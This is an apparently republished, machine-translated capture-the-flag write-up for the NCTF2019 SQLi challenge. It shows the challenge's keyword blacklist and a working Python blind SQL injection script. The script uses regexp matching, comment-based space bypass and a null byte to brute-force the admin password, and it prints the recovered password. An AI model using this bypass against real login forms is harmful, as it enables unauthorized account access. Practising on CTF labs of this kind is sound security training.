当前位置:网站首页>[NCTF2019]SQLi

[NCTF2019]SQLi

2022-07-27 00:48:00 A new reading of the tea classic

[NCTF2019]SQLi

Use dirsearch Sweep your face , Found out robots.txt

And then directly url Enter the view robots.txt Content

Found to have hint.txt Still enter the view hint.txt Content 

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

There are many contents in the blacklist here , Filtered a lot of things , also If $_POST['passwd'] === admin's password The password must be admin Will get your password flag

Use python Script burst password :

import requests
from urllib import parse
import string
import time
 
url='http://76cd948a-a7f3-4ab1-a28d-d7bc2bc26050.node4.buuoj.cn:81/index.php'
 
string= string.ascii_lowercase + string.digits + '_'
 
flag=''
 
for i in range(100):
    for j in string:
 
        data={
            "passwd":"||/**/passwd/**/regexp/**/\"^{}\";{}".format((flag+j),parse.unquote('%00')),
            #'passwd':'||/*1*/passwd/*1*/regexp/*1*/"^{}";{}'.format(i,'%00'),
            'username':"\\"
        }
        #print(data)
        res = requests.post(url=url,data=data).text
        #print(res)
        if 'welcome' in res:
            flag+=j
            print(flag)
            #print(res)
            break
        time.sleep(0.1)
    time.sleep(0.1)

Run to get the password

 you_will_never_know7788990

Any user name ( As long as it's not admin) The password is as above

 

原网站

版权声明
本文为[A new reading of the tea classic]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/208/202207262237374614.html

边栏推荐

猜你喜欢

随机推荐